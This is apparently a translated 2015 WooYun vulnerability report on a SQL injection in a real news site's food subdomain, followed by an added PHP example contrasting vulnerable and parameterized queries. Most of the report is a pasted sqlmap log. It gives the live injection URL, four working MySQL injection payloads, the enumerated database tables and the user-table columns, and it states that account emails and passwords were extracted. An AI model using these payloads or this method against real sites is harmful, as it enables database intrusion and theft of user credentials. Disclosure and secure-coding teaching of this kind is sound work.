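2015-10-16: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly
2015-11-30: The vendor has actively ignored the vulnerability; details are disclosed to the public
A domain under Beiqing Net (ynet.com), Beiqing Auto, has a SQL injection vulnerability that can lead to database disclosure
Beiqing Food injection point: http://bqfood.ynet.com/cgi/news.php?id=529503
Pasting the sqlmap log directly, as follows: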
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=529503 AND 3707=3707

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=529503 AND (SELECT 7830 FROM(SELECT COUNT(*),CONCAT(0x7163736471,(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END)),0x7175656d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 25 columns
    Payload: id=-4223 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7163736471,0x75636252756577444c53,0x7175656d71),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=529503 AND SLEEP(5)
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
current user: 'cgi@localhost'
current database: 'foodbq'

Database: foodbq
[25 tables]
+--------------+
| global       |
| user         |
| article_from |
| auto_ad      |
| auto_comment |
| auto_index   |
| blank_data   |
| complain     |
| fenlei       |
| food_person  |
| food_right   |
| food_topic   |
| food_topic1  |
| friend_links |
| navcode      |
| navigation   |
| news         |
| news_top     |
| news_top1    |
| pic_defaults |
| polymorphic  |
| sp_t28       |
| temp         |
| tempdef      |
| tuijian_top  |
+--------------+

Database: foodbq
Table: user
[12 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| createdatetime | datetime         |
| creator        | varchar(40)      |
| cu_id          | int(10)          |
| d_id           | int(12) unsigned |
| email          | varchar(255)     |
| mender         | varchar(40)      |
| mu_id          | int(10)          |
| nick           | varchar(255)     |
| passwd         | varchar(255)     |
| published      | char(1)          |
| savedatetime   | datetime         |
| url_1          | varchar(255)     |
+----------------+------------------+

Database: foodbq
Table: user
[236 entries]
+-------+--------+
| email | passwd |
+-------+--------+
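Only a selection of the accounts and passwords was taken.
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)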
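
The boolean-based finding above (`id=529503 AND 3707=3707` accepted in a numeric context) is what string-concatenated SQL looks like from outside. The following is an added example, not the site's code and not part of the original report, showing that pattern beside a validated, parameterized handler. Assumptions: the `title` column, both function names, an in-memory SQLite database standing in for the MySQL back end, and the false-condition input, which is constructed here only to show the response difference.

```php
<?php
// Added example. Only the `news` table name and `id` parameter come from the report.
$pdo = new PDO('sqlite::memory:'); // assumption: SQLite stands in for MySQL
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO news (id, title) VALUES (529503, 'constructed sample row')");

// Vulnerable pattern: the raw parameter is concatenated into a numeric
// context, so everything after the number is parsed as SQL.
function fetch_news_vulnerable(PDO $pdo, $rawId)
{
    $sql = 'SELECT id, title FROM news WHERE id = ' . $rawId;
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: accept only a positive integer, then bind it as a
// typed parameter so the value can never change the statement's structure.
function fetch_news_hardened(PDO $pdo, $rawId)
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    if ($id === false) {
        return null; // caller should answer with HTTP 400/404
    }
    $stmt = $pdo->prepare('SELECT id, title FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$inputs = array(
    '529503',                // legitimate request
    '529503 AND 3707=3707',  // payload from the sqlmap log (true condition)
    '529503 AND 3707=3708',  // constructed false counterpart
);
foreach ($inputs as $in) {
    $v = count(fetch_news_vulnerable($pdo, $in));
    $h = fetch_news_hardened($pdo, $in);
    printf("%-22s vulnerable rows=%d  hardened=%s\n",
        $in, $v, $h === null ? 'rejected' : count($h) . ' row(s)');
}
```

The vulnerable function returns one row for the true condition and none for the false one, which is the response difference a boolean-based blind test relies on; the hardened function rejects both before any query runs.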